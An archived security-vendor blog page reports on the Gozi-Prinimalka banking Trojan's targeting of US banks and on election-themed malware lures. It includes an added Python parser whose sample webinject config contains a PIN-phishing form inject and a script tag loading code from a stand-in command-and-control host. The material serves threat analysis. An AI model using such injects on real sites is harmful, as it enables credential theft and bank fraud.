    Archive for October 10th, 2012

    Recent reports have stated that a massive campaign of fraud is planned to hit various US banks. Approximately 100 cybercriminals are said to be part of this planned campaign.

    It is believed that this attack will be launched using newly-developed malware related to the Gozi banking Trojan, which has been called Gozi-Prinimalka. Overall, the capabilities of this new threat are broadly similar to other banking malware such as ZeuS, SpyEye, and Gozi itself.

    We’ve been able to analyze the configuration files of existing Gozi-Prinimalka variants that are currently in the wild. Based on this, customers of the following financial institutions are at increased risk:

    • Accurint
    • American Funds
    • Ameritrade
    • Bank of America
    • CapitalOne
    • Charles Schwab
    • Chase
    • Citibank
    • eTrade
    • Fidelity
    • Fifth Third Bank
    • HSBC
    • M&T Bank
    • Navy Federal Credit Union
    • PNC
    • Regions Financial Corporation
    • Scottrade
    • ShareBuilder
    • State Employees Credit Union
    • Suntrust
    • The Huntington National Bank
    • United States Automobile Association
    • USBank
    • Wachovia
    • Washington Mutual
    • Wells Fargo
    As we said earlier, we were able to determine the targeted institutions by analyzing the downloaded configuration files. A snippet of these configuration files clearly shows how we were able to determine which sites were at risk, as well as giving insights into the code that is used to modify the sites in question.
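    The triage step described above, as an added example that is not part of the original post: a small parser for a webinject-style configuration that lists the targeted URL patterns and the HTML each entry splices into the page, then matches the hosts against a watch list of institutions. The sample config, the ZeuS/SpyEye-style `set_url` / `data_*` syntax and the domains are all constructed assumptions; the real Gozi-Prinimalka format from the screenshot is not reproduced.

```python
import re

# Constructed sample in ZeuS/SpyEye-style webinject syntax (assumed format, not the post's config).
SAMPLE_CONFIG = """\
set_url https://*.examplebank.test/login* GP
data_before
<input type="password"*>
data_end
data_inject
<div>Confirm your PIN: <input type="text" name="pin"></div>
data_end
set_url http*://online.brokerexample.test/* G
data_before
</form>
data_end
data_inject
<script src="https://c2.example.invalid/inj.js"></script>
data_end
"""

def parse_webinjects(text):
    """Parse set_url / data_* blocks into dicts: url, flags, before, inject, after."""
    injects, block, buf = [], None, []
    for line in text.splitlines():
        if line.startswith("set_url "):
            parts = line.split(None, 2)
            injects.append({"url": parts[1], "flags": parts[2] if len(parts) > 2 else ""})
        elif line in ("data_before", "data_inject", "data_after"):
            block, buf = line[len("data_"):], []   # block name: before/inject/after
        elif line == "data_end" and block and injects:
            injects[-1][block], block = "\n".join(buf), None
        elif block is not None:
            buf.append(line)   # raw HTML/JS the Trojan would splice into the page
    return injects

def targeted_institutions(injects, watchlist):
    """Map watchlist names to inject hosts whose domain matches, ignoring wildcards."""
    hits = {}
    for inj in injects:
        # Strip scheme (incl. "http*"), path and leading "*." wildcards from the pattern.
        host = re.sub(r"^[a-z*]+://", "", inj["url"]).split("/", 1)[0].lstrip("*.")
        for name, domain in watchlist.items():
            if host == domain or host.endswith("." + domain):
                hits.setdefault(name, []).append(host)
    return hits

if __name__ == "__main__":
    watch = {"Example Bank": "examplebank.test", "Broker Example": "brokerexample.test"}
    for name, hosts in targeted_institutions(parse_webinjects(SAMPLE_CONFIG), watch).items():
        print(f"{name}: {', '.join(hosts)}")
```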

    We are in contact with the above financial institutions in order to help mitigate this threat. In the meantime, we advise clients of the institutions listed above to pay particular attention to any wire transfers made out of their accounts, as it is believed that this is how the attack will be conducted by the attackers.

    In the meantime, Trend Micro products detect these Trojans as various BKDR_URSNIF variants, such as BKDR_URSNIF.B. We are also working continuously to find and block any websites that host this malware, as well as any command-and-control servers.

    Posted in Bad Sites, Malware | Comments Off on US Banks Targeted By Fraud Campaign

    Many have watched the U.S. presidential debate last week, and while whether Barack Obama or Mitt Romney won the discussion is still up for debate among netizens, one thing is certain: the presidential campaign is on its last stretch towards the November 6th elections. One other thing that’s certain? Scammers exploiting this to the very end.

    Our researchers have been looking into the data gathered through the global sensors of our Smart Protection Network. Below is a snapshot of election-related keywords that got several hits to malicious sites:

    Keyword           # of Hits
    Obama                26,559
    Romney                4,519
    Elections               806
    2012 Elections          358

    Note that these hits are just for the past three months, and we expect them to increase as Election Day draws near. But what stood out for us is the number of hits for both candidates: apparently, when it comes to the number of failed attempts to access a malicious site, Obama gets the users’ vote. And cybercriminals agree: when we checked the number of unique domains blocked since January, there were 4 Obama-related domains for every 1 Romney domain.

    This shouldn’t come as a surprise, given that the incumbent President has had at least four years of pop-culture mindshare under his belt compared to Romney. Remember that from right after he won the 2008 elections up to his inauguration, Obama was used in several social engineering baits. Going back to the three-month snapshot, it can be seen that hits related to Obama have seen their share of highs and lows, while the increase in Romney-related hits was consistent around the period when his candidacy was officially announced in August.

    But looking at the type of threats and who the eventual victims were, both candidates are pretty much neck and neck. While it is quite obvious that most victims are from the United States and Canada, interestingly, the other top countries include those in Asia and Europe.

    The majority of the hits are from disease vector URLs (i.e., those that eventually download malicious files onto computers or host phishing sites) and spam-related URLs, which is consistent with previous election-related threats.

    Several malware families have also taken advantage of these two candidates, as we’ve seen file names that range from the curious (Drunken Obama.exe, which we detect as ADW_MARKETSCORE) to the somewhat serious (several PDF files like Romney V. Obama Tax Policies.pdf, which we heuristically detect as HEUR_PDFEXP.E). And apart from the malicious mobile apps we saw several weeks ago, based on our feedback, we’ve also seen infections from a relatively old SOHANAD worm, as well as from other AUTORUN malware (those that usually spread via removable drives) with backdoor capabilities, including the following:

    So what do these tell us? This reinforces the fact that the bad guys have all the bases covered when it comes to exploiting popular events. Whoever wins come November 6th, end users will end up losing in one way or another if they’re not careful. So keep yourself informed. Get your news only from trusted sources, and make sure to have an Internet security solution installed on your devices.

    Update as of October 11, 2012 7:30 AM PDT

    We’ve found a spam run using the election as social engineering bait as well. The email is supposedly from CNN and contains news stories about the election:

    However, instead of news articles, the links lead users to a variant of the ZeuS banking Trojan, delivered by the Blackhole exploit kit. We detect this variant as TSPY_ZBOT.NTW; in addition to blocking the malware we also block the malicious sites that were used by the Blackhole exploit kit in this incident.

    Posted in Bad Sites | Comments Off on Obama vs. Romney: Political (Online) Threats


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice